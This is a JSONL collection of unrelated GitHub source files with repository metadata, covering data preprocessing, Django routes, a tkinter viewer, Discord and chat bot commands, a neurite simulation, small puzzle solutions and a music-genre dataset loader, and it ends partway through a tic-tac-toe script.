+{"seq_id":"11887259242","text":"from DataOps import DataPrep\n\nif __name__ == '__main__':\n audio_folder = \"b:/!DATASETS/PDTSC/audio/\"\n transcript_folder = \"b:/!DATASETS/PDTSC/transcripts/\"\n save_folder = 'B:/!temp/'\n\n dp = DataPrep(audio_folder,\n transcript_folder,\n save_folder,\n dataset=\"pdtsc\",\n digitize_numbers=True,\n speeds=(1.0, ),\n mode=\"move\",\n delete_unused=True,\n delete_converted=True,\n debug=False)\n\n dp.run()","repo_name":"vejvarm/speech_recognition_with_TF2_at_UCT_Prague","sub_path":"data_prep/data_prep_PDTSC.py","file_name":"data_prep_PDTSC.py","file_ext":"py","file_size_in_byte":557,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"2651402570","text":"import json\nfrom typing import List\n\nPATH_SCHEMA = \"schemas.json\"\nwith open(PATH_SCHEMA) as fp:\n SCHEMA = {k: set(v) for k, v in json.load(fp).items()}\n\n\n# def parser(d: List[dict], fields: list, nested: bool = False, nested_field: str = None) -> list:\n# out = []\n\n# field_set = set(fields)\n# for x in d:\n# if nested is True:\n# assert nested_field is not None\n# x = x[nested_field]\n\n# entry = {**x}\n\n# existing_fields = set(x.keys())\n# nonexisted_fields = field_set.difference(existing_fields)\n# for f in nonexisted_fields:\n# entry[f] = None\n\n# out.append(entry)\n\n# return\n\n\ndef parser(name: str, d: List[dict], schema: dict) -> dict:\n def parse(r, field_set):\n entry = {**r}\n\n existing_fields = set(r.keys())\n nonexisted_fields = field_set.difference(existing_fields)\n for f in nonexisted_fields:\n entry[f] = None\n\n return entry\n\n if name == \"BI_ASSET_01\":\n name = \"BI_ASSET\"\n elif name == \"BI_ASSET_02\":\n name = \"BI_ASSETSTATUS\"\n\n out = {name: []}\n\n for x in d:\n if name == \"BI_ASSET\":\n\n p_asset = parse(x, schema[name])\n\n if \"assetancestor\" in x:\n if \"BI_ASSETANCESTOR\" not in out:\n out['BI_ASSETANCESTOR'] = []\n if 'assetancestor' in p_asset:\n del p_asset['assetancestor']\n\n for x1 in x['assetancestor']:\n p = parse(x1, schema['BI_ASSETANCESTOR'])\n p['assetuid'] = p_asset['assetuid']\n\n out['BI_ASSETANCESTOR'].append(p)\n\n out[name].append(p_asset)\n if name == \"BI_INVE\":\n\n p_inve = parse(x, schema[name])\n\n if \"invcost\" in x:\n if \"BI_INVCOST\" not in out:\n out['BI_INVCOST'] = []\n if 'invcost' in p_inve:\n del p_inve['invcost']\n\n for x1 in x['invcost']:\n p = parse(x1, schema['BI_INVCOST'])\n p['inventoryid'] = p_inve['inventoryid']\n\n out['BI_INVCOST'].append(p)\n\n out[name].append(p_inve)\n elif name == \"BI_MATU\":\n if \"BI_INVU_MATU\" not in out:\n out['BI_INVU_MATU'] = []\n if \"BI_INVUL_MATU\" not in out:\n out['BI_INVUL_MATU'] = []\n\n p_matu = parse(x, schema['BI_MATU'])\n\n if \"invuse\" in x:\n if 'invuse' in p_matu:\n del p_matu['invuse']\n\n if isinstance(x['invuse'], dict):\n x['invuse'] = [x['invuse']]\n for x1 in x['invuse']:\n p = parse(x1, schema['BI_INVU'])\n out['BI_INVU_MATU'].append(p)\n\n if \"invuseline\" in x:\n if 'invuseline' in p_matu:\n del p_matu['invuseline']\n\n if isinstance(x['invuseline'], dict):\n x['invuseline'] = [x['invuseline']]\n for x1 in x['invuseline']:\n p = parse(x1, schema['BI_INVUL'])\n out['BI_INVUL_MATU'].append(p)\n\n out[name].append(p_matu)\n\n elif name == \"BI_MATR\":\n if \"BI_INVU_MATR\" not in out:\n out['BI_INVU_MATR'] = []\n if \"BI_INVUL_MATR\" not in out:\n out['BI_INVUL_MATR'] = []\n\n p_matr = parse(x, schema['BI_MATR'])\n\n if \"invuse\" in x:\n if 'invuse' in p_matr:\n del p_matr['invuse']\n\n if isinstance(x['invuse'], dict):\n x['invuse'] = [x['invuse']]\n for x1 in x['invuse']:\n p = parse(x1, schema['BI_INVU'])\n out['BI_INVU_MATR'].append(p)\n if \"invuseline\" in x:\n if 'invuseline' in p_matr:\n del p_matr['invuseline']\n\n if isinstance(x['invuseline'], dict):\n x['invuseline'] = [x['invuseline']]\n for x1 in x['invuseline']:\n p = parse(x1, schema['BI_INVUL'])\n out['BI_INVUL_MATR'].append(p)\n\n out[name].append(p_matr)\n\n elif name == \"BI_WO\":\n if \"BI_WOSTATUS\" not in out:\n out['BI_WOSTATUS'] = []\n\n p_wo = parse(x, schema['BI_WO'])\n\n if \"wostatus\" in x:\n if 'wostatus' in p_wo:\n del p_wo['wostatus']\n\n for x1 in x['wostatus']:\n p = parse(x1, schema['BI_WOSTATUS'])\n p['workorderid'] = p_wo['workorderid']\n\n out['BI_WOSTATUS'].append(p)\n\n out[name].append(p_wo)\n\n else:\n p = parse(x, schema[name])\n out[name].append(p)\n\n return out\n\n# def preprocess(data: dict, name: str) -> dict:\n# # NOTE: HoangLe [Apr-04]: This version will be used in optimizing phase\n\n# if name == \"BI_ASSET\":\n# if 'assetstatus' in data['member'][0]:\n# out = {\n# 'BI_ASSETSTATUS': parser(data['member'], SCHEMA['BI_ASSETSTATUS'],\n# True, 'assetstatus')\n# }\n# else:\n# out = {\"BI_ASSET\": parser(data['member'], SCHEMA['BI_ASSET'])}\n# elif name == \"BI_WO\":\n# if 'wostatus' in data['member'][0]:\n# out = {'BI_WOSTATUS': parser(data['member'], SCHEMA['BI_WOSTATUS'],\n# True, 'wostatus')}\n\n# else:\n# out = {'BI_WO': parser(data['member'], SCHEMA['BI_WO'])}\n# elif name in ['BI_MATU', 'BI_MATR']:\n# if 'invuse' in data['member'][0]:\n# out = {\n# 'BI_INVU': parser(data['member'], SCHEMA['BI_INVU'],\n# True, 'invuse')}\n# elif 'invuseline' in data['member'][0]:\n# out = {'BI_INVUL': parser(data['member'], SCHEMA['BI_INVUL'],\n# True, 'invuseline')}\n# else:\n# out = {name: parser(data['member'], SCHEMA[name])}\n# else:\n# out = {name: parser(data['member'], SCHEMA[name])}\n\n# return out\n\n\ndef preprocess(data: dict, name: str) -> dict:\n return parser(name, data['member'], SCHEMA)\n","repo_name":"hoangletc/azure-func-spp_preprocess","sub_path":"spp_preprocess/process.py","file_name":"process.py","file_ext":"py","file_size_in_byte":6375,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"38822388035","text":"from django.urls import path\r\nfrom.import views\r\n\r\nurlpatterns = [\r\n \r\n path('', views.index, name=\"index\"),\r\n path('blog/', views.blog, name=\"blog\"),\r\n path('main/', views.mainPage, name=\"main\"),\r\n path('myprofile/', views.myprofile, name=\"myprofile\"),\r\n path('profile/', views.profile, name=\"profile\"),\r\n\r\n\r\n path('signup/', views.signup_view, name=\"signup\"),\r\n path('login/', views.login_view, name=\"login\"),\r\n path('logout/', views.logout_view, name=\"logout\"),\r\n path('', views.login_view, name=\"Index\"),\r\n\r\n \r\n path('createbiodata/', views.biodata_create, name=\"createbiodata\"),\r\n path('biodatalist/', views.biodata_list, name=\"biodatalist\"),\r\n path('biodatadetail/', views.biodata_detail, name=\"biodatadetail\"),\r\n \r\n path('searchbio/', views.search_bio, name=\"searchbio\"),\r\n path('news/', views.news, name=\"news\"),\r\n path('pricing/', views.pricing_view, name=\"pricing\"),\r\n \r\n \r\n \r\n\r\n\r\n\r\n\r\n\r\n]\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"Lamya-ishrat/Matrimonial-website","sub_path":"urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":991,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"14619613196","text":"from PIL import Image, ImageTk\nimport tkinter\nfrom matplotlib import pyplot as plt\n\n\ndef plot_binomial(a, b, c, mn=-10, mx=10):\n values = tuple(range(mn, mx + 1))\n ys = tuple(a * x**2 + b * x + c for x in values)\n return plt.plot(values, ys)\n\n\n# init\nwindow = tkinter.Tk()\nwindow.geometry(\"800x600+10+20\")\n\n# настройка ui\nrow = tkinter.Frame()\nlab = tkinter.Label(row, width=8, text=\"Размер: \", anchor='w')\n\nent = tkinter.Entry(row)\nbutton = tkinter.Button(row, text='!!!')\nrow.pack()\nlab.pack(side=tkinter.LEFT)\nent.pack()\nbutton.pack(side=tkinter.RIGHT)\n\nlabel = tkinter.Label(window)\nlabel.pack()\n\n\n# заполнение GUI\ndef display_image(new_image, new_scale=1.0):\n image = new_image.resize(\n (int(new_image.size[0] * new_scale),\n int(new_image.size[1] * new_scale)))\n tk_image = ImageTk.PhotoImage(image)\n label.configure(image=tk_image)\n label.image = tk_image\n\n\n# обработчики кнопок\ndef scale_image():\n try:\n new_scale = float(ent.get())\n except Exception:\n print(\"Число не float!\")\n return\n display_image(raw_image, new_scale)\n\n\nbutton.configure(command=scale_image)\n\n\ndef main(image, scale):\n global raw_image, start_scale\n raw_image = image\n start_scale = scale\n ent.insert(tkinter.END, str(start_scale))\n display_image(raw_image, start_scale)\n window.mainloop()\n\n\nif __name__ == \"__main__\":\n raw_image = Image.open('teo_ik.png')\n start_scale = 0.1\n main(raw_image, start_scale)\n","repo_name":"ghMaxi/aip2022","sub_path":"seminars/2022-04-20/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1526,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"5285119696","text":"from typing import List, Tuple, Any\nimport datetime\n\nfrom core.bot import Bot\nfrom core.data import custom_data_chunk, DataChunkBase, DataManagerError\nfrom core.command.const import *\nfrom core.command import UserCommandBase, custom_user_command\nfrom core.command import BotCommandBase, BotSendMsgCommand\nfrom core.communication import MessageMetaData, PrivateMessagePort, GroupMessagePort\nfrom utils.time import get_current_date_str, get_current_date_raw, str_to_datetime, datetime_to_str\n\nCFG_CHAT_INTER = \"chat_interval\"\n\n# 增加自定义DataChunk\nDC_CHAT_RECORD = \"chat_record\"\nDCK_CHAT_TIME = \"time\"\n\n\n@custom_data_chunk(identifier=DC_CHAT_RECORD)\nclass _(DataChunkBase):\n def __init__(self):\n super().__init__()\n\n\ndef get_default_chat_time(interval: int) -> str:\n cur_time = get_current_date_raw()\n cur_time = cur_time - datetime.timedelta(seconds=interval+1)\n return datetime_to_str(cur_time)\n\n\n@custom_user_command(readable_name=\"自定义对话指令\", priority=DPP_COMMAND_PRIORITY_TRIVIAL,\n flag=DPP_COMMAND_FLAG_FUN | DPP_COMMAND_FLAG_CHAT)\nclass ChatCommand(UserCommandBase):\n \"\"\"\n 自定义对话指令\n \"\"\"\n\n def __init__(self, bot: Bot):\n super().__init__(bot)\n bot.cfg_helper.register_config(CFG_CHAT_INTER, \"20\", \"自定义聊天触发间隔, 单位:秒\")\n self.interval: int = -1\n self.interval_delta: datetime.timedelta = datetime.timedelta(seconds=20)\n\n def can_process_msg(self, msg_str: str, meta: MessageMetaData) -> Tuple[bool, bool, Any]:\n should_proc: bool = False\n target: str = meta.group_id if meta.group_id else meta.user_id\n try:\n time_str = self.bot.data_manager.get_data(DC_CHAT_RECORD, [target, DCK_CHAT_TIME])\n except DataManagerError:\n default_time = get_default_chat_time(self.get_interval())\n time_str = self.bot.data_manager.get_data(DC_CHAT_RECORD, [target, DCK_CHAT_TIME], default_val=default_time)\n feedback = \"\"\n if get_current_date_raw() >= str_to_datetime(time_str) + self.get_interval_delta():\n feedback = self.bot.loc_helper.process_chat(msg_str)\n if feedback:\n should_proc = True\n self.bot.data_manager.set_data(DC_CHAT_RECORD, [target, DCK_CHAT_TIME], get_current_date_str())\n should_pass: bool = False\n return should_proc, should_pass, feedback\n\n def process_msg(self, msg_str: str, meta: MessageMetaData, hint: Any) -> List[BotCommandBase]:\n port = GroupMessagePort(meta.group_id) if meta.group_id else PrivateMessagePort(meta.user_id)\n feedback: str = hint\n return [BotSendMsgCommand(self.bot.account, feedback, [port])]\n\n def get_help(self, keyword: str, meta: MessageMetaData) -> str:\n return \"\"\n\n def get_description(self) -> str:\n return \"\"\n\n def get_interval(self) -> int:\n if self.interval >= 0:\n return self.interval\n try:\n self.interval = int(self.bot.cfg_helper.get_config(CFG_CHAT_INTER)[0])\n except (ValueError, IndexError):\n self.interval = 20\n self.interval_delta = datetime.timedelta(seconds=self.interval)\n return self.interval\n\n def get_interval_delta(self) -> datetime.timedelta:\n if self.interval >= 0:\n return self.interval_delta\n self.get_interval()\n return self.interval_delta\n","repo_name":"pear-studio/nonebot-dicepp","sub_path":"src/plugins/DicePP/module/common/chat_command.py","file_name":"chat_command.py","file_ext":"py","file_size_in_byte":3413,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"52"} +{"seq_id":"42841686510","text":"import discord\nfrom discord.ext import commands\nfrom functions import admin_funcs\nfrom discord.commands import Option\nfrom datetime import datetime\nimport asyncio\nfrom discord.commands import OptionChoice\nfrom variables import global_vars\n\n\nclass admin_commands(commands.Cog):\n def __init__(self, bot):\n self.bot = bot\n\n @commands.Cog.listener()\n async def on_application_command_completion(self, ctx):\n\n channel = self.bot.get_channel(global_vars.log_channel_id)\n embed = discord.Embed(\n description=\n f\"Executed Command: {ctx.command}\\nAuthor: {ctx.author.mention}\\nLocation: {ctx.channel.mention}\",\n timestamp=datetime.now(),\n color=discord.Colour.green(),\n )\n embed.set_footer(text=f\"User ID: {ctx.author.id}\")\n embed.set_author(name=f\"{ctx.author}\", icon_url=ctx.author.avatar)\n await channel.send(embed=embed)\n\n\n# Logging - send embed to aws-logs channel when command is invoked whether failed or successful\n\n @commands.Cog.listener()\n async def on_application_command(self, ctx):\n channel = self.bot.get_channel(global_vars.log_channel_id)\n embed = discord.Embed(\n description=\n f\"Invoked Command: {ctx.command}\\nAuthor: {ctx.author.mention}\\nLocation: {ctx.channel.mention}\",\n timestamp=datetime.now(),\n color=discord.Colour.yellow(),\n )\n embed.set_footer(text=f\"User ID: {ctx.author.id}\")\n embed.set_author(name=f\"{ctx.author}\", icon_url=ctx.author.avatar)\n await channel.send(embed=embed)\n\n \n @commands.Cog.listener()\n async def on_message_delete(self, msg):\n # call global variable\n global_vars.message = msg\n return global_vars.message\n\n @commands.Cog.listener()\n async def on_bulk_message_delete(self, msgs):\n # call global variable\n global_vars.message = msgs\n global_vars.messages_count = len(msgs)\n return global_vars.message,global_vars.messages_count\n\n # Clear Command\n log_choice = [\n OptionChoice(name=\"Yes\", value=\"Yes\"),\n OptionChoice(name=\"No\", value=\"No\")\n ]\n\n @discord.slash_command(guild_ids=[global_vars.server_id],\n description=\"clear messages in chat.\")\n @commands.has_role(global_vars.administrator)\n async def clear(self, ctx, amount: Option(\n discord.SlashCommandOptionType.integer,\n description=\"amount of messages\",\n required=True,\n ), user: Option(\n discord.SlashCommandOptionType.user,\n description=\"purge messages from user\",\n required=False,\n default=None,\n ), logging: Option(discord.SlashCommandOptionType.string,\n description=\"enable or disable logging\",\n required=False,\n default=None,\n choices=log_choice)):\n await ctx.response.defer(ephemeral=True)\n channel = self.bot.get_channel(global_vars.log_channel_id)\n if ctx.channel.id == global_vars.log_channel_id and logging == \"Yes\":\n # purge with logging\n await admin_funcs.purge(ctx, amount, user)\n \n if amount == 1:\n # call purge-logging\n await asyncio.sleep(5)\n await admin_funcs.purge_logging(ctx, channel, amount, global_vars.message)\n else:\n # call purge-logging\n await asyncio.sleep(5)\n await admin_funcs.purge_logging(ctx, channel, amount, global_vars.message)\n else:\n # purge without logging in other channels\n await admin_funcs.purge(ctx, amount, user)\n\n # Package Command\n @discord.slash_command(guild_ids=[global_vars.server_id],\n description=\"package logs before todays date.\")\n @commands.has_role(global_vars.administrator)\n async def package(\n self,\n ctx,\n amount: Option(\n discord.SlashCommandOptionType.integer,\n description=\"amount of messages\",\n required=True,\n ),\n ):\n await ctx.response.defer(ephemeral=True)\n channel = self.bot.get_channel(global_vars.log_channel_id)\n if ctx.channel.id == global_vars.log_channel_id:\n messages = await channel.history(limit=amount).flatten()\n global_vars.messages_count = len(messages)\n await asyncio.sleep(5)\n await admin_funcs.package_logging(ctx, channel, amount, messages)\n else:\n await ctx.respond(\n f\"/package command can only be ran in {channel.mention}\",\n ephermal=True)\n\ndef setup(bot):\n bot.add_cog(admin_commands(bot))\n","repo_name":"creationsoftre/AWS-Discord-BOT","sub_path":"cogs/admin_commands.py","file_name":"admin_commands.py","file_ext":"py","file_size_in_byte":4747,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"8426396703","text":"\n# coding: utf-8\n\n# In[1]:\n\n\nimport requests\nresponse = requests.get(\"http://www.novelscape.net/wxxs/j/jingyong/ffwz/001.htm\")\nresponse.encoding = \"big5\"\nbook1 = response.text\n\n\n# In[2]:\n\n\nbook1[:]\n\n\n# In[4]:\n\n\nbook1[0:]\n\n\n# In[5]:\n\n\nbook1[:87]\n\n\n# In[6]:\n\n\nbook1[87:8787]\n\n\n# In[7]:\n\n\nbook1[87:8787:87]\n\n\n# In[8]:\n\n\nbook1[:87:3]\n\n\n# In[9]:\n\n\nbook1[0::87]\n\n\n# In[10]:\n\n\nbook1[::87] \n\n","repo_name":"Bro-Chen-beep/JerryHW","sub_path":"0312/0312-3.py","file_name":"0312-3.py","file_ext":"py","file_size_in_byte":384,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"41735461665","text":"from typing import Any\nfrom django.db import models\n\n# Create your models here.\n\n# ==================== #\n# Base Project Model\n# ==================== #\nclass Project(models.Model):\n title = models.CharField(max_length=100)\n short_description = models.TextField(default=\"\")\n description = models.TextField(default=\"\")\n \n class Meta:\n # Make this an abstract class so that it wont be created in the database\n abstract = True\n\n def __init__(self, *args: Any, **kwargs: Any) -> None:\n super().__init__(*args, **kwargs)\n self.static_preview_path = ''\n \n\nclass Lab(Project):\n pdf_title = models.CharField(max_length=100)\n abstract = models.TextField(default=\"\")\n \n class Meta:\n db_table = 'home_lab'\n \nclass Game(Project):\n url = models.CharField(max_length=100)\n \n class Meta:\n db_table = 'home_game'\n \n\n","repo_name":"the-iron-ryan/personal-website","sub_path":"home/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":889,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"12787914188","text":"import os\nimport pygame\n\n\nclass Core:\n \"\"\"Basically just a container for anything most closely classified a \"core engine\" function.\"\"\"\n\n KEY_LEFT = pygame.K_LEFT\n KEY_RIGHT = pygame.K_RIGHT\n KEY_UP = pygame.K_UP\n KEY_DOWN = pygame.K_DOWN\n KEY_ESCAPE = pygame.K_ESCAPE\n\n SPECIAL_CHARS = (KEY_LEFT, KEY_RIGHT, KEY_UP, KEY_DOWN, KEY_ESCAPE)\n\n def __init__(self, display_width, display_height):\n # filesystem info\n self.main_dir = os.path.split(os.path.abspath(__file__))[0]\n self.images_dir = os.path.join(self.main_dir, \"images\")\n\n # creating a Core initializes pygame\n pygame.init()\n\n # display info\n self.display_width = display_width\n self.display_height = display_height\n self.display = pygame.display.set_mode((self.display_width, self.display_height))\n\n self.__caption = None\n self.__icon = None\n\n self.load_fonts()\n\n # input handling\n self.__is_pressed = {}\n self.mouse = (0, 0, 0)\n self.run = True\n\n def set_caption(self, display_name):\n \"\"\"Sets the title on the window.\"\"\"\n self.__caption = display_name\n if self.__caption:\n pygame.display.set_caption(self.__caption)\n\n def set_icon(self, name):\n \"\"\"Loads 'name' and sets it as the window icon.\"\"\"\n self.__icon = self.load_image(name)\n if self.__icon:\n pygame.display.set_icon(self.__icon)\n\n def load_image(self, name):\n \"\"\"Loads a pygame image and returns it.\"\"\"\n fullname = os.path.join(self.images_dir, name)\n try:\n image = pygame.image.load(fullname)\n except pygame.error as err:\n raise SystemExit(err)\n # image = image.convert()\n return image\n\n def load_fonts(self):\n \"\"\"Loads some pygame fonts into the Core.\"\"\"\n self.font_small = pygame.font.SysFont(\"comicsansms\", 25)\n self.font_med = pygame.font.SysFont(\"comicsansms\", 50)\n self.font_large = pygame.font.SysFont(\"comicsansms\", 80)\n\n def message_to_screen(msg, color, y_displace=0, size=\"small\"):\n text_surface, text_rect = create_text_objects(msg, color, size)\n text_rect.center = (display_width / 2), (display_height / 2) + y_displace\n self.display.blit(text_surface, text_rect)\n\n def is_key_pressed(self, key):\n \"\"\"Returns True if key is currently being pressed.\"\"\"\n if key not in self.SPECIAL_CHARS:\n key = ord(key.lower())\n\n return self.__is_pressed.get(key, False)\n\n def is_left_clicked(self):\n return self.mouse[2]\n\n def get_mouse_pos(self):\n return self.mouse[0], self.mouse[1]\n\n def update_input(self):\n for key in self.__is_pressed.keys():\n self.__is_pressed[key] = False\n\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n self.run = False\n if event.type == pygame.KEYDOWN:\n self.__is_pressed[event.key] = True\n if event.type == pygame.KEYUP:\n self.__is_pressed[event.key] = False\n\n if event.type == pygame.MOUSEBUTTONDOWN:\n self.mouse = (*event.pos, event.button)\n print(self.mouse)\n if event.type == pygame.MOUSEBUTTONUP:\n self.mouse = (*event.pos, 0)\n print(self.mouse)","repo_name":"ajmacedonia/Rysk","sub_path":"core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":3384,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"36569120121","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom tqdm import tqdm\n\ndef closestDistanceBetweenLines(a0, a1, b0, b1, clampAll=False, clampA0=False, clampA1=False, clampB0=False,\n clampB1=False):\n ''' Given two lines defined by numpy.array pairs (a0,a1,b0,b1)\n Return the closest points on each segment and their distance\n '''\n\n # If clampAll=True, set all clamps to True\n if clampAll:\n clampA0 = True\n clampA1 = True\n clampB0 = True\n clampB1 = True\n\n # Calculate denomitator\n A = a1 - a0\n B = b1 - b0\n magA = np.linalg.norm(A)\n magB = np.linalg.norm(B)\n\n _A = A / magA\n _B = B / magB\n\n cross = np.cross(_A, _B)\n denom = np.linalg.norm(cross) ** 2\n\n # If lines are parallel (denom=0) test if lines overlap.\n # If they don't overlap then there is a closest point solution.\n # If they do overlap, there are infinite closest positions, but there is a closest distance\n if not denom:\n d0 = np.dot(_A, (b0 - a0))\n\n # Overlap only possible with clamping\n if clampA0 or clampA1 or clampB0 or clampB1:\n d1 = np.dot(_A, (b1 - a0))\n\n # Is segment B before A?\n if d0 <= 0 >= d1:\n if clampA0 and clampB1:\n if np.absolute(d0) < np.absolute(d1):\n return a0, b0, np.linalg.norm(a0 - b0)\n return a0, b1, np.linalg.norm(a0 - b1)\n\n\n # Is segment B after A?\n elif d0 >= magA <= d1:\n if clampA1 and clampB0:\n if np.absolute(d0) < np.absolute(d1):\n return a1, b0, np.linalg.norm(a1 - b0)\n return a1, b1, np.linalg.norm(a1 - b1)\n\n # Segments overlap, return distance between parallel segments\n return None, None, np.linalg.norm(((d0 * _A) + a0) - b0)\n\n # Lines criss-cross: Calculate the projected closest points\n t = (b0 - a0)\n detA = np.linalg.det([t, _B, cross])\n detB = np.linalg.det([t, _A, cross])\n\n t0 = detA / denom\n t1 = detB / denom\n\n pA = a0 + (_A * t0) # Projected closest point on segment A\n pB = b0 + (_B * t1) # Projected closest point on segment B\n\n # Clamp projections\n if clampA0 or clampA1 or clampB0 or clampB1:\n if clampA0 and t0 < 0:\n pA = a0\n elif clampA1 and t0 > magA:\n pA = a1\n\n if clampB0 and t1 < 0:\n pB = b0\n elif clampB1 and t1 > magB:\n pB = b1\n\n # Clamp projection A\n if (clampA0 and t0 < 0) or (clampA1 and t0 > magA):\n dot = np.dot(_B, (pA - b0))\n if clampB0 and dot < 0:\n dot = 0\n elif clampB1 and dot > magB:\n dot = magB\n pB = b0 + (_B * dot)\n\n # Clamp projection B\n if (clampB0 and t1 < 0) or (clampB1 and t1 > magB):\n dot = np.dot(_A, (pB - a0))\n if clampA0 and dot < 0:\n dot = 0\n elif clampA1 and dot > magA:\n dot = magA\n pA = a0 + (_A * dot)\n\n return pA, pB, np.linalg.norm(pA - pB)\n\ndef point_in_cube(x):\n return x * (np.random.rand(3) - .5)\n\nour_data = {'threshold':[],'connection probability':[],'number of connections':[]}\npaper = {'threshold':[],'connection probability':[],'number of connections':[]}\n\nfor i in range(10):\n # simulation parameters\n cube_side = 10e-6 # [m] # 1 we look at 10 μm sides for this\n threshold_dist = 1e-6 # [m] # 1 μm\n neurite_density = 10.61e18 # [m^(-3)] # density is 10.61 μm3. \n num_samples = int(neurite_density * cube_side**3)\n\n # empty array to save distance samples in\n dist_samples = np.empty(num_samples)\n\n for i in tqdm(range(num_samples)):\n # generate line segments\n P1 = point_in_cube(cube_side)\n P2 = point_in_cube(cube_side)\n Q1 = point_in_cube(cube_side)\n Q2 = point_in_cube(cube_side)\n\n # calculate the closest distance between 2 lines\n P, Q, d = closestDistanceBetweenLines(P1, P2, Q1, Q2)\n\n # save distance\n dist_samples[i] = d\n\n # plot histogram\n our_data['threshold'].append(threshold_dist*10**6)\n our_data['connection probability'].append(np.sum(np.where(dist_samples>> d20 = Dice(20)\n >>> 1 <= d20.roll() <= 20\n True\n \"\"\"\n\n def __init__(self, sides):\n self.sides = sides\n\n def roll(self):\n return random.randint(1, self.sides)\n\n\ndef main():\n \"\"\"\n Roll n-sided dice and return each result and the total.\n\n >>> monkeypatch = getfixture('monkeypatch')\n >>> monkeypatch.setattr('sys.argv', ['roll-dice'])\n >>> main()\n rolled ...\n >>> monkeypatch.setattr('sys.argv', ['roll-dice', '2'])\n >>> main()\n rolled ...\n rolled ...\n total ...\n \"\"\"\n options = _get_options()\n dice = Dice(options.sides)\n rolls = [dice.roll() for n in range(options.number)]\n for roll in rolls:\n print('rolled', roll)\n if options.number > 1:\n print('total', sum(rolls))\n\n\n__name__ == '__main__' and main()\n","repo_name":"jaraco/jaraco.util","sub_path":"jaraco/util/dice.py","file_name":"dice.py","file_ext":"py","file_size_in_byte":1152,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"70570972325","text":"import math\n\ndef solution(progresses, speeds):\n days = []\n answer = []\n \n for progress, speed in zip(progresses, speeds):\n days.append(math.ceil((100 - progress) / speed))\n\n maximum = days[0]\n day_cnt = 0\n for day in days:\n if day > maximum:\n maximum = day\n answer.append(day_cnt)\n day_cnt = 1\n else: \n day_cnt += 1\n answer.append(day_cnt)\n \n return answer\n \n","repo_name":"jeanP-tech/Algorithms","sub_path":"기능개발.py","file_name":"기능개발.py","file_ext":"py","file_size_in_byte":472,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"11327529509","text":"\"\"\"\n215 = 32768 ve rakamlarının toplamı 3+2+7+6+8 = 26'dır.\n21000 sayısının rakamlarının toplamı kaçtır?\n\"\"\"\nnumber = 2**1000\ndigits = []\n\nwhile number > 0:\n digit = number % 10\n digits.insert(0, digit)\n number = number // 10\npowerDigitSum = sum(digits)\nprint(powerDigitSum)","repo_name":"OZDOKUR/Python-euler","sub_path":"16_Power_Digit_Sum.py","file_name":"16_Power_Digit_Sum.py","file_ext":"py","file_size_in_byte":295,"program_lang":"python","lang":"tr","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"17015499363","text":"import logging\nfrom typing import Tuple\n\nimport numpy as np\nimport tensorflow as tf\n\nfrom mgc.audioset.loaders import MusicGenreSubsetLoader\nfrom mgc.audioset.transform import flatten_features, tensor_to_numpy\nfrom mgc.experiments.base import DatasetLoader\n\n\nclass NumpyMusicGenreSetLoader(DatasetLoader):\n\n def __init__(self, datadir):\n self.datadir = datadir\n\n def load(\n self,\n balanced=False,\n repeat=False) -> Tuple[np.array, np.array, np.array, np.array]:\n \"\"\"\n Returns a tuple including train and test sets\n as np arrays: (X, y, X_test, y_test)\n \"\"\"\n loader = MusicGenreSubsetLoader(\n self.datadir,\n repeat=repeat\n )\n\n if balanced:\n ids, X, y = loader.load_bal()\n else:\n ids, X, y = loader.load_unbal()\n\n ids, X, y = tensor_to_numpy(ids, X, y)\n X = flatten_features(X)\n\n ids_test, X_test, y_test = loader.load_eval()\n _, X_test, y_test = tensor_to_numpy(ids_test, X_test, y_test)\n X_test = flatten_features(X_test)\n\n logging.info('Training dataset X shape: %s', X.shape)\n logging.info('Training dataset y shape: %s', y.shape)\n\n return X, y, X_test, y_test\n\n\nclass TFMusicGenreSetLoader(DatasetLoader):\n \"\"\"\n Loads data set as tensorflow tensors\n \"\"\"\n\n def __init__(self, datadir):\n self.datadir = datadir\n\n def load(\n self,\n batch_size,\n balanced=False,\n repeat=False) -> Tuple[tf.Tensor, tf.Tensor, np.array, np.array]:\n \"\"\"\n Returns a tuple including train and test (X, y, X_test, y_test)\n Train set is loaded as TF Tensors\n Test set is loaded as np arrays\n \"\"\"\n loader = MusicGenreSubsetLoader(\n self.datadir,\n repeat=True,\n batch_size=batch_size\n )\n\n if balanced:\n ids, X, y = loader.load_bal()\n else:\n ids, X, y = loader.load_unbal()\n\n test_loader = MusicGenreSubsetLoader(\n self.datadir,\n repeat=False,\n batch_size=2500\n )\n ids_test, X_test, y_test = test_loader.load_eval()\n ids_test, X_test, y_test = tensor_to_numpy(ids_test, X_test, y_test)\n\n return X, y, X_test, y_test\n","repo_name":"jramcast/music-genre-classification-audioset","sub_path":"mgc/dataloading.py","file_name":"dataloading.py","file_ext":"py","file_size_in_byte":2342,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"52"} +{"seq_id":"74162001125","text":"#Function Create Table\ndef createBoard():\n lst_1=['7','8','9']\n lst_2=['4','5','6']\n lst_3=['1','2','3']\n global matrix \n matrix = 